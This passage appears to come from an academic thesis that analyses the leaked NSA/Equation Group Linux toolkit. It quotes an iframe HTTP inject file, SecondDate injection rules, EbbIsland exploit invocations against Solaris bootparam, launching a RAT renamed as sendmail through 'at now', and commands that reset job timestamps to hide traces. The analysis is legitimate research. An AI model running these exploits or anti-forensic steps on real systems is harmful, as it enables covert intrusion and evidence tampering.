Condiciones previas al diseño del sistema propuesto

The Linux opscript (NSA, 2008) consists of a total of 12000 lines, with approximately one third comments and the remainder shell commands. The opscript is basically a "Hack by numbers" guide. The last 10% of lines are the original "hand tasking" (manual hacking) methods.

A typical operator of Unix systems is a Mobile Network Operator. The opscript contains instructions to search for data available on the systems of such operators, e.g., Call Data

1_{https://github.com/x0rz/EQGRP/blob/master/Linux/bin/tunnel} 2_{https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.linux_remove_} in_install_ss.COMMON 3_{https://github.com/x0rz/EQGRP/blob/master/Linux/up/stoicctrls.tar/stoicctrls} 4_{https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.stoicsurgeon.} COMMON

Record (CDR) data, International Mobile Equipment Identity (IMEI) to IMSI associations and Cell ID to MSC addresses as shown below:

### CDR data storage; Once you identify the location of the data, you'll ### checks for IMEIs that have more than one \gls{imsi} associated with it: ### generates a list of Cell IDs associated with each MSC address:

Manual Hacking Methods

Due to its earlier origins and smaller size, the original hand tasking was examined rst to provide an introduction as to how target systems are tasked or hacked. Two of the previously secret tools used to exploit information systems, SecondDate and EbbIsland are described below.

The SecondDate command and control server can be used manually, with the documen- tation5 _{providing example instructions for the user to congure the inject le, starting}

with the HTTP information and tag, as shown below:

HTTP/1.1 200 OK Pragma: no-cache

Content-Type: text/html

Cache-Control: no-cache,no-store <inject_file_begin>

<html><meta http-equiv="refresh" content="0"><body><iframe

src="<REPLACE_WITH_URL_TO_USE>"height="1" width="1" scrolling="no" frameborder="0"

unselectable="yes"marginheight="0" marginwidth="0"></iframe></body></html>

,→ ,→

<inject_file_end>

It continues by explaining that regular expressions to be passed to implants need to be stored in les without any extraneous characters or carriage returns and provides two examples of how to achieve this:

vi -b -c "set noeol" <filename> # or

echo -n <regex> > <filename>

5_{https://github.com/misterch0c/shadowbroker/blob/master/Linux/doc/old/etc/user.tool.} seconddate.COMMON

4.2. SHADOW BROKERS - NSA / EQUATION GROUP 48 Examples of rules which specify the IP address, network mask and port of the target, the maximum number of injections, the injection window, regex le and the injection le are then provided.

1 rule 1 --srcaddr <target_network_address> --srcmask 255.255.255.0 --dstport 80

--maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt

,→

2 rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file_1>

--injectfile pkt

,→

The SecondDate tool allows for the rules to be listed and enabled or disabled on an individual basis. Rules can also be checked for hits and the log can be checked, fetched or cleared.

The EbbIsland tool is used to target Solaris versions 2.6 through 2.10. It does so by targeting a vulnerable RPC service, bootparam, with shellcode to provide a root shell account.

Noteworthy functionality includes load instead of a core le scramble option. This runs the attack but substitutes the shell code payload with random data to overwrite the previously generated core le with one that contains innocuous content. The stated intention was to allow the operator to remove traces of failed attempts to access the system.

It can be used with a port redirector and a general usage example, followed by a Solaris 2.9 specic example are provided:

1 -tunnel

2 l <RHP> <TARGET IP> <BOOTPARAM_TCP_PORT> 3 l 32794 10.40.1.2 32790

4 ./ebbisland -t <REDIRECTOR_IP> -p <REDIRECTOR_PORT> -r

<TARGET_RPC.BOOTPARAMD_PROGRAMNUMBER> -X -N -A <SPECIFIC_SHELLCODE_ADDRESS>

,→

5 ./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908

Once root shell access has been gained following successful use of the tool, the packrat6

tool can be used to package the Remote Access Trojan (RAT) binary, noserver7 _by

renaming it to sendmail before compressing, uuencoding it and making it available for upload. For more details see Appendix B.9.

6_{https://github.com/adamcaudill/EquationGroupLeak/tree/master/Linux/bin/packrat} 7_{Linux/up/noserver}

Checking the morerats sub-directory revealed that 32 bit noserver binaries were available for Apple Darwin (x86), AIX (RS/6000 v3.1), FreeBSD (x86), HPUX (PA RISC1.1) and Solaris (SPARC and x86).

The opscript reveals that packrat is meant to be used in conjunction with a port redirector via nstun. This provides access to packrat running on the hacker's local machine. The EbbIsland tool notes state that the method to launch the noserver binary (renamed as sendmail) is to use the at command with the now option before changing the timestamps of the at jobs and verifying that they have been changed to remove the signs of when the at job was created to launch the application (NSA, 2010).

1 # EXPLOIT WINDOW (CREATING AT JOB)

2 echo "PATH=. D=-ulrandom11111-55555-2 sendmail" | at now 3 netstat -an | grep random11111-55555-2

4

5 # TOUCH THE ATJOBS FILE BACK TO BEFORE TIME 6 touch -r x /var/spool/cron/atjobs

7

8 # VERIFY TIMES FROM BEFORE 9 ls -lart /var/spool/cron

10 ls -lart /var/spool/cron/atjobs

A section on cleaning implores the hacker to use the correct exploit for the target architec- ture to avoid the target RPC daemon from aborting, core dumping and logging heavily. This is explained in more detail by the EbbIsland tool notes, which list the /core direc- tory in addition to the /var/adm/messages log le as sources of evidence to be cleaned up. Both the opscript and tool guides advocate using the -C option to clean up core les.